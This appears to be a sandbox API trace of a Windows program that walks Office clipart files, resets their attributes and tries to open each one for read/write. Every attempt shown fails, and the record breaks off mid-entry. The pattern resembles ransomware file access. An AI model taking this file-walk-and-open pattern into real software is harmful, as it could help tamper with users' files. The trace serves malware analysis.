1 [0133.969] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF", dwFileAttributes=0x80) returned 0 [0133.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.969] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.970] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.970] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF", dwFileAttributes=0x80) returned 0 [0133.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.970] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.970] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.970] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF", dwFileAttributes=0x80) returned 0 [0133.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.971] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.971] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.971] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.971] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF", dwFileAttributes=0x80) returned 0 [0133.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.972] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.972] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.972] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF", dwFileAttributes=0x80) returned 0 [0133.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.972] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.972] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.972] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF", dwFileAttributes=0x80) returned 0 [0133.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.973] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.973] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF", dwFileAttributes=0x80) returned 0 [0133.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.973] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.974] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF", dwFileAttributes=0x80) returned 0 [0133.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.974] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.974] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.975] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF", dwFileAttributes=0x80) returned 0 [0133.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.975] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.975] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.975] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.975] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF", dwFileAttributes=0x80) returned 0 [0133.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.976] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.976] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.976] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF", dwFileAttributes=0x80) returned 0 [0133.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.977] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.977] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.977] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.977] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF", dwFileAttributes=0x80) returned 0 [0133.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.978] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.978] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.978] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.978] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF", dwFileAttributes=0x80) returned 0 [0133.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.978] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.978] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.978] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.978] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF", dwFileAttributes=0x80) returned 0 [0133.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.979] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.979] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.979] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF", dwFileAttributes=0x80) returned 0 [0133.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.979] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.979] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.979] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF", dwFileAttributes=0x80) returned 0 [0133.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.980] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.980] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.980] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF", dwFileAttributes=0x80) returned 0 [0133.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.981] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.981] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF", dwFileAttributes=0x80) returned 0 [0133.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.981] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.982] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.982] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF", dwFileAttributes=0x80) returned 0 [0133.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.982] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.982] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.982] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF", dwFileAttributes=0x80) returned 0 [0133.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.983] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.983] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.983] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF", dwFileAttributes=0x80) returned 0 [0133.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.984] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.984] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF", dwFileAttributes=0x80) returned 0 [0133.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.984] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.984] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF", dwFileAttributes=0x80) returned 0 [0133.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.985] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.985] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.985] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.985] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF", dwFileAttributes=0x80) returned 0 [0133.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.986] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.986] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.986] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF", dwFileAttributes=0x80) returned 0 [0133.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.986] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.986] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.986] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF", dwFileAttributes=0x80) returned 0 [0133.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.987] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.987] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.987] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF", dwFileAttributes=0x80) returned 0 [0133.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.988] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.988] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.988] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF", dwFileAttributes=0x80) returned 0 [0133.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.989] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.989] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.989] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.989] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF", dwFileAttributes=0x80) returned 0 [0133.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.989] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.989] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.989] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.989] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF", dwFileAttributes=0x80) returned 0 [0133.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.990] CloseHandle 